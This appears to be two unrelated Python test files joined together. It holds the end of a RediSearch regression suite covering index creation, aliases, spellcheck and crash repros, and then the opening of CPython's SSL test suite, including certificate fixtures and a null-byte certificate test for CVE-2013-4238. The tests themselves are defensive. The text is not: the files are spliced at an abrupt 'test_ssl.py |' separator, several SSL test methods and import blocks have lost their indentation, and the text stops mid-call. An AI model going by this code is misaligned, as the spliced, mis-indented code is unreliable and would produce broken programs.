    env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
    # Create a document and then replace it.
    env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
    env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
            'FIELDS', 'textfield', 's100', 'numfield', 990)
    env.dump_and_reload()
    # RDB Should still be fine
    env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
            'FIELDS', 'textfield', 's200', 'numfield', 1090)
    doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
    env.assertEqual('s200', doc['textfield'])
    env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
    # Regression: an index with the maximum number of sortable fields (255)
    # used to break after an RDB reload.
    command = ['ft.create', 'idx', 'schema']
    for x in range(255):
        command += ['t{}'.format(x), 'numeric', 'sortable']
    # Drop the trailing 'sortable' so the last field is plain numeric.
    command = command[:-1]
    env.cmd(*command)
    for _ in env.reloading_iterator():
        try:
            env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
        except redis.ResponseError as e:
            # NOTE: e.message is Python-2 only; the whole file targets Py2.
            env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
    # Regression: searching for a term containing '-' ("no-as") used to
    # crash the server instead of returning an empty result.
    env.cmd('ft.create', 'myIdx', 'schema',
            'title', 'TEXT', 'WEIGHT', '5.0',
            'body', 'TEXT',
            'url', 'TEXT')
    # NOTE(review): 'bod' does not match the schema field 'body' — possibly a
    # typo, but the assertion below does not depend on it.  Confirm upstream.
    env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
    rv = env.cmd('ft.search', 'myIdx', 'no-as')
    env.assertEqual([0], rv)
def testIssue446(env):
    # Regression: LIMIT 0 0 must return only the total match count.
    env.cmd('ft.create', 'myIdx', 'schema',
            'title', 'TEXT', 'SORTABLE')
    # The stray '"' inside the url value is part of the original repro input.
    env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
    rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
    env.assertEqual([1], rv)

    # Related - issue 635
    env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
    rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
    env.assertEqual([2], rv)
def testTimeoutSettings(env):
    # ON_TIMEOUT accepts only RETURN or FAIL; anything else is an error.
    env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
    env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
    env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
    env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
    # Exercise the full alias lifecycle: add, duplicate-add, implicit removal
    # on index drop, delete, re-add, RDB persistence, and aliasUpdate.
    env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
    env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')

    env.cmd('ft.aliasAdd', 'myIndex', 'idx')
    # Writes and reads through the alias must hit the target index.
    env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
    r = env.cmd('ft.search', 'idx', 'hello')
    env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
    r2 = env.cmd('ft.search', 'myIndex', 'hello')
    env.assertEqual(r, r2)

    # try to add the same alias again; should be an error
    env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
    env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
    # now delete the index
    env.cmd('ft.drop', 'myIndex')
    # index list should be cleared now. This can be tested by trying to alias
    # the old alias to different index
    env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
    env.cmd('ft.aliasAdd', 'alias2', 'idx2')
    env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
    r = env.cmd('ft.search', 'alias2', 'hello')
    env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)

    # check that aliasing one alias to another returns an error. This will
    # end up being confusing
    env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()

    # check that deleting the alias works as expected
    env.expect('ft.aliasDel', 'myIndex').notRaiseError()
    env.expect('ft.search', 'myIndex', 'foo').raiseError()

    # create a new index and see if we can use the old name
    env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
    env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
    env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
    # also, check that this works in rdb save
    for _ in env.retry_with_rdb_reload():
        r = env.cmd('ft.search', 'myIndex', 'foo')
        env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)

    # Check that we can move an alias from one index to another
    env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
    r = env.cmd('ft.search', 'myIndex', "hello")
    env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)

    # Test that things like ft.get, ft.aggregate, etc. work
    r = env.cmd('ft.get', 'myIndex', 'doc2')
    env.assertEqual(['t1', 'hello'], r)

    r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
    env.assertEqual([1, ['t1', 'hello']], r)

    r = env.cmd('ft.del', 'myIndex', 'doc2')
    env.assertEqual(1, r)
def testNoCreate(env):
    # NOCREATE: fail when the document does not exist; once the document
    # exists (via plain REPLACE), REPLACE NOCREATE must succeed.
    env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
    # NOCREATE without REPLACE is invalid.
    env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
    env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
    env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
    env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
# Standalone functionality
def testIssue484(env):
    # Issue with split
    # 127.0.0.1:6379> ft.drop productSearch1
    # OK
    # 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
    # OK
    # 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
    # OK
    # 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
    # OK
    # 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
    # OK
    # 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
    # OK
    # 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
    # OK
    # 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
    # Reproduce the transcript above: a GROUPBY over a split() APPLY
    # expression used to return wrong results.
    env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
            'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
    env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
    env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
    env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
    env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
    env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
    res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
                  'load', '2', '@color', '@categoryid',
                  'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
                  'GROUPBY', '1', '@value',
                  'REDUCE', 'COUNT', '0', 'as', 'value_count',
                  'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
    expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
    assertAggrowsEqual(env, expected, res)
    for var in expected:
        env.assertIn(var, res)
def testIssue501(env):
    # SPELLCHECK on a very long unknown term with both an INCLUDE and an
    # EXCLUDE dictionary used to misbehave; expect no suggestions.
    env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
    env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
    env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
    rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
                 'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
    # rv[0] is ['TERM', <term>, <suggestions>]; the term echoes back with
    # an empty suggestion list.
    env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
    env.assertEqual([], rv[0][2])
def testIssue589(env):
    # A syntactically invalid SPELLCHECK query must return a parse error,
    # not crash.
    env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
    env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
    env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
    # A PARTIAL replace that omits a TAG field must keep the previously
    # indexed tag value searchable.
    env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
    env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
    env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
    env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
    # GH 666: adding a document whose key collides with one of the index's
    # own internal keys (e.g. 'ft:foo/two') used to crash the server.
    # Now it must be rejected with an error, and unrelated adds still work.
    env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
    env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')

    # crashes here
    with env.assertResponseError():
        env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
    # try with replace:
    with env.assertResponseError():
        env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
                'FIELDS', 'bar', 'four five six')
    with env.assertResponseError():
        env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
                'FIELDS', 'bar', 'four five six')

    # A normal key is still accepted after the rejected ones.
    env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testOptionalFilter(env):
    """Optional (~) query nodes must parse, EXPLAIN and execute without
    crashing, including with a per-term weight attribute."""
    env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
    for x in range(100):
        env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields',
                't1', 'hello world word{}'.format(x))
    # Parenthesized print: valid in both Python 2 and 3, and consistent
    # with the print(r) call below (was a Py2-only print statement).
    print(env.cmd('ft.explain', 'idx', '(~@t1:word20)'))

    r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
    print(r)
def grouper(iterable, n, fillvalue=None):
    """Collect data into fixed-length chunks or blocks.

    grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx

    The last chunk is padded with *fillvalue* up to length *n*.
    """
    # itertools.izip_longest is Python-2 only; fall back to the Python-3
    # name so this helper works under either interpreter.
    try:
        from itertools import izip_longest as zip_longest
    except ImportError:
        from itertools import zip_longest
    # n references to the SAME iterator -> zip_longest pulls n items per chunk.
    args = [iter(iterable)] * n
    return zip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
    """Convert a flat [key1, val1, key2, val2, ...] reply into a dict."""
    pairs = ((r[i], r[i + 1]) for i in range(0, len(r), 2))
    return dict(pairs)
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
    """Return the path of a test data file located next to this module."""
    base = os.path.dirname(__file__)
    return os.path.join(base, *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.

CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")

# empty CRL
CRLFILE = data_file("revocation.crl")

# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# Host used by the (optional) network-access tests.
REMOTE_HOST = "self-signed.pythontest.net"

# Deliberately invalid / special-case certificates and keys:
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")

DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
    """When running verbosely, print the current exception with *prefix*."""
    exc_text = ' '.join(traceback.format_exception(*sys.exc_info()))
    if support.verbose:
        sys.stdout.write(prefix + exc_text)
def can_clear_options():
    """True if OpenSSL is new enough to support clearing context options."""
    minimum = (0, 9, 8, 13, 15)  # 0.9.8m or higher
    return ssl._OPENSSL_API_VERSION >= minimum
def no_sslv2_implies_sslv3_hello():
    """True on OpenSSL builds where disabling SSLv2 implies an SSLv3 hello."""
    minimum = (0, 9, 7, 8, 15)  # 0.9.7h or higher
    return ssl.OPENSSL_VERSION_INFO >= minimum
def have_verify_flags():
    """True if this OpenSSL supports certificate verification flags."""
    minimum = (0, 9, 8, 0, 15)  # 0.9.8 or higher
    return ssl.OPENSSL_VERSION_INFO >= minimum
def utc_offset():
    """Return the local UTC offset in seconds (local time = UTC + offset).

    NOTE: ignores corner cases such as issue #1647654.
    """
    dst_active = time.daylight and time.localtime().tm_isdst > 0
    return -time.altzone if dst_active else -time.timezone
def asn1time(cert_time):
    """Normalize an ASN1-style timestamp for comparison.

    OpenSSL 0.9.8i ignores the seconds field (see #18207); on that exact
    version, zero out the seconds and fix the day padding. Everywhere else,
    the string passes through unchanged.
    """
    if ssl._OPENSSL_API_VERSION != (0, 9, 8, 9, 15):
        return cert_time
    fmt = "%b %d %H:%M:%S %Y GMT"
    parsed = datetime.datetime.strptime(cert_time, fmt)
    result = parsed.replace(second=0).strftime(fmt)
    # %d pads with a leading zero but ASN1_TIME_print() uses a leading space
    if result[4] == "0":
        result = result[:4] + " " + result[5:]
    return result
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    # Decorator: skip *func* on Debian/Ubuntu builds whose patched OpenSSL
    # raises SSLError when constructing an SSLv2 context.
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        @functools.wraps(func)
        def f(*args, **kwargs):
            try:
                # Probing construction is enough to detect the broken patch.
                ssl.SSLContext(ssl.PROTOCOL_SSLv2)
            except ssl.SSLError:
                # NOTE(review): platform.linux_distribution() was removed in
                # Python 3.8 — this path only runs on old interpreters.
                if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
                    platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
                    raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
            return func(*args, **kwargs)
        return f
    else:
        # SSLv2 not compiled in at all: nothing to guard against.
        return func

# Skip decorator for tests that require Server Name Indication support.
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
    def test_constants(self):
        # Touch each constant so a missing attribute raises AttributeError.
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED
        ssl.OP_CIPHER_SERVER_PREFERENCE
        ssl.OP_SINGLE_DH_USE
        if ssl.HAS_ECDH:
            ssl.OP_SINGLE_ECDH_USE
        if ssl.OPENSSL_VERSION_INFO >= (1, 0):
            ssl.OP_NO_COMPRESSION
        # Feature probes must be real booleans, not arbitrary truthy values.
        self.assertIn(ssl.HAS_SNI, {True, False})
        self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
    def test_random(self):
        # Exercise the RAND_* wrappers around OpenSSL's PRNG.
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))

        # RAND_pseudo_bytes reports whether its output is cryptographic,
        # which must agree with RAND_status.
        data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
        self.assertEqual(len(data), 16)
        self.assertEqual(is_cryptographic, v == 1)
        if v:
            data = ssl.RAND_bytes(16)
            self.assertEqual(len(data), 16)
        else:
            # Without sufficient entropy, RAND_bytes must refuse.
            self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)

        # negative num is invalid
        self.assertRaises(ValueError, ssl.RAND_bytes, -5)
        self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)

        if hasattr(ssl, 'RAND_egd'):
            self.assertRaises(TypeError, ssl.RAND_egd, 1)
            self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        # RAND_add accepts str, bytes and bytearray entropy sources.
        ssl.RAND_add("this is a random string", 75.0)
        ssl.RAND_add(b"this is a random bytes object", 75.0)
        ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
    @unittest.skipUnless(os.name == 'posix', 'requires posix')
    def test_random_fork(self):
        # After fork(), parent and child must draw different PRNG streams.
        status = ssl.RAND_status()
        if not status:
            self.fail("OpenSSL's PRNG has insufficient randomness")

        # Pipe carries the child's random bytes back to the parent.
        rfd, wfd = os.pipe()
        pid = os.fork()
        if pid == 0:
            try:
                os.close(rfd)
                child_random = ssl.RAND_pseudo_bytes(16)[0]
                self.assertEqual(len(child_random), 16)
                os.write(wfd, child_random)
                os.close(wfd)
            except BaseException:
                os._exit(1)
            else:
                # _exit avoids running the parent's cleanup in the child.
                os._exit(0)
        else:
            os.close(wfd)
            self.addCleanup(os.close, rfd)
            _, status = os.waitpid(pid, 0)
            self.assertEqual(status, 0)

            child_random = os.read(rfd, 16)
            self.assertEqual(len(child_random), 16)
            parent_random = ssl.RAND_pseudo_bytes(16)[0]
            self.assertEqual(len(parent_random), 16)

            self.assertNotEqual(child_random, parent_random)
    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['issuer'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        # Note the next three asserts will fail if the keys are regenerated
        self.assertEqual(p['notAfter'], asn1time('Oct  5 23:01:56 2020 GMT'))
        self.assertEqual(p['notBefore'], asn1time('Oct  8 23:01:56 2010 GMT'))
        self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
        self.assertEqual(p['subject'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                        )
        # extra OCSP and AIA fields
        self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
        self.assertEqual(p['caIssuers'],
                         ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
        self.assertEqual(p['crlDistributionPoints'],
                         ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
    def test_parse_cert_CVE_2013_4238(self):
        # CVE-2013-4238: embedded NUL bytes in certificate fields must be
        # preserved by the parser, not silently truncated.
        p = ssl._ssl._test_decode_cert(NULLBYTECERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        subject = ((('countryName', 'US'),),
                   (('stateOrProvinceName', 'Oregon'),),
                   (('localityName', 'Beaverton'),),
                   (('organizationName', 'Python Software Foundation'),),
                   (('organizationalUnitName', 'Python Core Development'),),
                   (('commonName', 'null.python.org\x00example.org'),),
                   (('emailAddress', 'python-dev@python.org'),))
        self.assertEqual(p['subject'], subject)
        self.assertEqual(p['issuer'], subject)
        if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
        else:
            # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '<invalid>'))

        self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
    def test_openssl_version(self):
        # The three version exports (number, tuple, string) must be
        # self-consistent and within sane bounds.
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, int)
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 3.0
        self.assertLess(n, 0x30000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 3)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 63)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by {Open,Libre}SSL, the format might change
        if "LibreSSL" in s:
            self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
                            (s, t, hex(n)))
        else:
            self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                            (s, t, hex(n)))
    @support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        with support.check_warnings(("", ResourceWarning)):
            del ss
            # With no cycle, dropping the last reference collects it at once
            # (CPython refcounting) and the weakref goes dead.
            self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
    def test_errors(self):
        # Invalid wrap_socket() argument combinations raise ValueError;
        # missing certificate files surface as ENOENT OSErrors.
        sock = socket.socket()
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified",
                        ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified for server-side operations",
                        ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified for server-side operations",
                        ssl.wrap_socket, sock, server_side=True, certfile="")
        with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
            # A server-side socket cannot initiate a connection.
            self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
                                   s.connect, (HOST, 8080))
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock,
                    certfile=CERTFILE, keyfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock,
